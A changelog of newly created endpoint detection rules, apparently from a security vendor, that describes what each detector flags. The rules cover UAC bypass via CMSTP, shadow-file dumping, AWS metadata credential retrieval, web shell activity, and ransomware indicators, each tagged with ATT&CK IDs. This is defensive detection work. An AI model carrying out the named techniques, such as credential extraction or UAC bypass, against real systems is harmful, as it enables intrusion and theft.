==================================================

CREATED: WIN-CMSTP-UAC-BYPASS (#2024)

Description

This detector identifies a User Access Control (UAC) bypass technique by leveraging the CMSTP COM object.

ATT&CK Technique T1191
ATT&CK Technique T1088

==================================================

CREATED: WIN-OFFICE-ARCHIVE-WRITE (#2191)

Description

This detector identifies Microsoft Office products writing an archive to disk. Adversaries can craft a maldoc to deliver a malicious archive to a host.

ATT&CK Technique T1192

==================================================

CREATED: WIN-IE4UINIT-BASE-SETTINGS (#2213)

Description

This detector identifies IE4UINIT launching with the switch -basesettings. Adversaries can place arbitrary code within the ie4uinit.inf file.

ATT&CK Technique T1088

==================================================

CREATED: PRODUCT-MARSHMALLOW-SWEET (#2217)

This detector identifies executions of programs that are part of the MarshmallowSweet product, these programs are classified as Adware in the Generic category. Known to distribute various types of adware.

==================================================

CREATED: PRODUCT-BITCOMET (#2219)

This detector identifies executions of programs that are part of the Bitcomet product, these programs are classified as P2P in the Torrent category. A Peer-to-Peer application which could lead to the installation of unwanted software.

==================================================

CREATED: NIX-SHADOW-OUTPUT-TEMP (#2222)

Description

This detector identifies dumping the shadow file to the tmp directory. Adversaries utilize these files and directories for reconnaissance and extracting credentials.

ATT&CK Technique T1087

==================================================

CREATED: WIN-WMIC-SPAWNING-REGSVR32 (#2231)

Description

This detector identifies the Windows Management command-line utility (wmic.exe) spawning Regsvr32.exe. This is an unusual process ancestry employed by the Astaroth malware family.

ATT&CK Technique T1117
ATT&CK Technique T1220

==================================================

CREATED: WIN-RUNDLL-EXEC-TEMP (#2232)

Description

This detector identifies instances of the Windows Rundll32 process executing malicious DLL's from Temp directories.

ATT&CK Technique T1085
ATT&CK Technique T1129

==================================================

CREATED: WIN-DTRACK-EXECUTION (#2236)

Description

This detector identifies a unique command line string present in DTrack infections. DTrack is a remote access trojan malware family attributed to the Lazarus group. DTrack executes a ping sleep timer before attempting to redirect an echo string with incorrect syntax.

==================================================

CREATED: WIN-W3WP-CMD-ECHO (#2239)

Description

This detector identifies a chain of execution from a Windows IIS worker process (w3wp.exe) spawning the Command Processor (cmd.exe). In order to redirect data back to a web shell the echo command is commonly used. This tactic is employed by adversaries to execute commands via compromised web servers.

ATT&CK Technique T1100

==================================================

CREATED: ANY-DIG-SIG-DBG (#2240)

Description

This detector identifies execution of binaries signed by known pentest groups. These code signing certificates have been observed by Red Canary in red team engagements.

ATT&CK Technique T1116

==================================================

CREATED: WIN-SYSPREP-EXEC-APPDATA (#2242)

Description

This detector identifies instances of the Windows binary sysprep.exe loading code from suspicious locations. The sysprep.exe binary can allow adversaries to elevate privileges due to its elevated privileges which can bypass User Account Control (UAC).

ATT&CK Technique T1088

==================================================

CREATED: WIN-RUNDLL-EXEC-ORDINAL-CALL (#2243)

Description

This detector identifies suspicious instances of the Windows process rundll32.exe executing an exported DLL function by its ordinal value.

ATT&CK Technique T1085

==================================================

CREATED: WIN-EXEC-OUTLOOK-TEMP-FOLDER (#2248)

Description

This detector identifies binaries executing from the Microsoft Outlook Temp folder. Adversaries can store payloads within this directory.

ATT&CK Technique T1193

==================================================

CREATED: WIN-SUSP-MSIEXEC-DIR (#2249)

Description

This detector identifies instances of the Microsoft Installer process (msiexec.exe) executing from abnormal directories.

ATT&CK Technique T1218

==================================================

CREATED: WIN-EXEC-USER-DEFAULT-FOLDER (#2250)

Description

This detector identifies binaries executing from the Windows directory C:\Users\Default.

ATT&CK Technique T1036

==================================================

CREATED: WIN-RYUK-CMD-LINE (#2251)

Description

This detector identifies an indicator for the early stages of deployment of Ryuk ransomware.

==================================================

CREATED: WIN-EXEC-CONFIG-SYSPROF-FOLDER (#2253)

Description

This detector identifies binaries executing from the Windows directory \windows\system32\config\systemprofile\.

ATT&CK Technique T1063

==================================================

CREATED: PRODUCT-NORDVPN-VPN (#2262)

This detector identifies executions of programs that are part of the NORDVPN product, these programs are classified as Riskware in the VPN category. A third-party, potentially unwanted, VPN client.

ATT&CK Technique T1410

==================================================

CREATED: WIN-SEARCHPROTOCOLHOST-NO-CLI (#2263)

Description

This detector identifies instances of the Windows process searchprotocolhost.exe executing without command line arguments.

==================================================

CREATED: LINUX-CF-AWS-INSTANCE-METADATA (#2266)

Description

This detector identifies the use of the AWS Instance Metadata Service to
obtain AWS security credentials.

ATT&CK Technique T1522

==================================================

CREATED: PRODUCT-HAOZIP (#2267)

This detector identifies executions of programs that are part of the Haozip product, these programs are classified as Adware in the Generic category. Known to distribute various types of adware.

==================================================

CREATED: WIN-DEVTOOLS-EXEC-SUSP-BIN (#2269)

Description

This detector identifies instances of a Visual Studio developer component executing suspicious processes.

ATT&CK Technique T1127

==================================================

CREATED: LINUX-CF-JAVA-SPAWNING-SHELL (#2270)

Description

This detector identifies a network-active Java process spawning a shell,
which could be indicative of webserver exploitation, a webshell, or a backdoor.

ATT&CK Technique T1100
ATT&CK Technique T1059

==================================================

CREATED: LINUX-CF-JAVA-SUSPICIOUS-CHILD (#2271)

Description

This detector identifies a Java process spawning a child of interest.

==================================================

CREATED: WIN-POSSIBLE-SCRIPT-DROPPER (#2275)

Description

This detector identifies instances of scripts executing from directories commonly observed with malware droppers.

ATT&CK Technique T1064

==================================================

CREATED: WIN-EXPLORER-SPAWN-INSTALLUTIL (#2277)

Description

This detector identifies Windows Explorer spawning the .Net Framework Installation Utility (installuti.exe). Adversaries can leverage installutilto proxy execution of code through a trusted Windows utility as a means to bypass application whitelisting.

ATT&CK Technique T1118
ATT&CK Technique T1218

==================================================

CREATED: WIN-TASKSCHE-WANNACRY (#2279)

Description

Detector detects processes executing that indicate WannaCry ransomware.

==================================================

CREATED: WIN-MEMSECSVC-WANNACRY (#2281)

Description

Detector detects processes executing that indicate WannaCry ransomware.

Did this answer your question?